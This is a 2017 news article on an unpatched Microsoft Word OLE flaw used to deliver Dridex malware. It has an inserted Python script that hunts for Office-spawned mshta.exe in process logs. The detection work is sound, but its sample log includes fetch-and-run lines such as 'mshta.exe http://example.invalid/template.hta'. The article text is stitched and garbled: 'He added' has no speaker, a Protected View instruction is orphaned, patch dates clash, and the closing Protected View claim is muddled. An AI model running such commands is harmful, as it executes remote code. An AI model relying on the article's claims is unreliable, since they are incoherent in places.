Published: Thu, April 13, 2017
Hi-Tech | By Merle Christensen

Security Alert: Hackers Exploiting Microsoft Word To Infect Computers With Malware

FireEye researchers who discovered a bug in Word's Object Linking and Embedding (OLE) technology were working with Microsoft on a fix, but were pre-empted by a disclosure from McAfee, as previously reported. Most software vulnerabilities give attackers user-level code execution capability.

An unpatched vulnerability in Microsoft Word is being exploited to forward Dridex malware to millions of unsuspecting users.

According to a report by Ars Technica, "the vulnerability is notable because it bypasses exploit mitigations built into Windows, doesn't require targets to enable macros, and works even against Windows 10, which is widely considered Microsoft's most secure operating system ever".

The attack is being used openly in the wild, and Microsoft has been aware of the issue for several weeks.

Microsoft is likely to release a security update along with its next batch of updates, scheduled for this Tuesday.

In the meantime, McAfee has warned users not to open Microsoft Office files obtained from untrusted sources.

Microsoft's Patch Tuesday release of fixes is due tomorrow. "The update addresses the vulnerability by correcting the way that Microsoft Office and WordPad parses specially crafted files, and by enabling API functionality in Windows that Microsoft Office and WordPad will leverage to resolve the identified issue".

The exploit connects to a remote server controlled by the attacker, downloads a file that contains HTML Application content, and executes it as an .hta file, according to a blog post by McAfee. OLE, which allows an application to embed other documents or objects, was used in 2014 by an advanced persistent threat group known as Sandworm to target government organizations and infrastructure providers in Europe and the North Atlantic Treaty Organisation (NATO).

He added that a successful exploit closes the bait Word document and displays a decoy document to the victim in its place.
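The chain described above (Word opens a document, fetches HTML Application content from a remote server, and runs it as an .hta file) leaves a recognisable trace in process-creation telemetry: on Windows, .hta files are executed by mshta.exe, so a Word or WordPad process spawning mshta.exe, or mshta.exe being launched with a URL, is something a defender can hunt for. The following is an added detection example, not code from the article or from McAfee, FireEye or Proofpoint; the log format and every log line are constructed for illustration (a simplified key=value layout in the spirit of Sysmon process-creation events), and the process names used as indicators are assumptions based on the behaviour the article describes.

```python
"""Flag Office-to-HTA process chains in process-creation logs (added example)."""
import re
from dataclasses import dataclass

# Office parents worth watching; the article names Word and WordPad as the affected
# parsers, the other entries are an assumption for broader coverage.
OFFICE_PARENTS = {"winword.exe", "wordpad.exe", "excel.exe", "powerpnt.exe"}
# mshta.exe is the built-in Windows host for .hta (HTML Application) files.
HTA_HOSTS = {"mshta.exe"}

# Constructed sample log: one benign Word print helper, one Word-spawned mshta with a
# remote URL, one mshta run by an admin on a local file, one mshta pulling a remote URL
# from explorer. example.invalid is a reserved, non-resolvable domain.
SAMPLE_LOG = r"""
ts=2017-04-11T09:12:01 event=ProcessCreate parent=explorer.exe image=winword.exe cmd="winword.exe C:\Users\alice\Downloads\invoice.doc"
ts=2017-04-11T09:12:04 event=ProcessCreate parent=winword.exe image=mshta.exe cmd="mshta.exe http://example.invalid/template.hta"
ts=2017-04-11T09:12:06 event=ProcessCreate parent=winword.exe image=splwow64.exe cmd="splwow64.exe 12288"
ts=2017-04-11T09:15:30 event=ProcessCreate parent=explorer.exe image=mshta.exe cmd="mshta.exe C:\Tools\local_admin_panel.hta"
ts=2017-04-11T09:16:02 event=ProcessCreate parent=explorer.exe image=mshta.exe cmd="mshta.exe http://example.invalid/update.hta"
""".strip()

# key=value pairs; values are either double-quoted (may contain spaces) or bare tokens.
LINE_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


def parse_line(line: str) -> dict:
    """Parse one key=value log line into a dict (quotes removed from values)."""
    fields = {}
    for m in LINE_RE.finditer(line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


@dataclass
class Finding:
    ts: str
    parent: str
    image: str
    cmd: str
    reason: str


def classify(event: dict):
    """Return a reason string if the event matches a hunting rule, else None."""
    if event.get("event") != "ProcessCreate":
        return None
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    cmd = event.get("cmd", "")
    # Rule 1: an Office application directly spawning the HTA host.
    if image in HTA_HOSTS and parent in OFFICE_PARENTS:
        return "office-spawned-mshta"
    # Rule 2: the HTA host launched with a remote URL, whatever the parent.
    if image in HTA_HOSTS and re.search(r"https?://", cmd, re.IGNORECASE):
        return "mshta-remote-url"
    return None


def scan(log_text: str) -> list:
    """Run every rule over every line and collect the matches in log order."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        reason = classify(ev)
        if reason:
            findings.append(Finding(ev["ts"], ev["parent"], ev["image"], ev["cmd"], reason))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.reason}: {f.parent} -> {f.image} [{f.cmd}]")
```

Run against the constructed sample, the scan reports two findings: the Word-spawned mshta.exe fetching a remote .hta, and the explorer-launched mshta.exe with a remote URL; the local .hta run by an administrator and Word's own print helper are left alone. The two rules are deliberately separate so that the first (an Office parent) can be treated as high confidence while the second is triaged against known administrative use of local HTA tooling.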

In a blog post, Proofpoint researchers said the vulnerability represents a "significant level of agility and innovation" for the developers of the Dridex banking Trojan, which traditionally spreads to Windows users via macro-based documents in email attachments. In its own blog post, the anti-virus company also said that the malware attack is possible because of Microsoft's OLE (Object Linking and Embedding) technology, as TNW has reported.

From the list, click Open in Protected View.

Once the file is open and the exploit runs successfully, Dridex botnet ID 7500 is installed on the user's PC and an attacker can begin hoovering up banking details.

Ryan Hanson, a researcher at security firm Optiv and the person Microsoft credited with reporting the critical bug, said exploits can execute malicious code even when Protected View, a built-in mitigation, has not been disabled.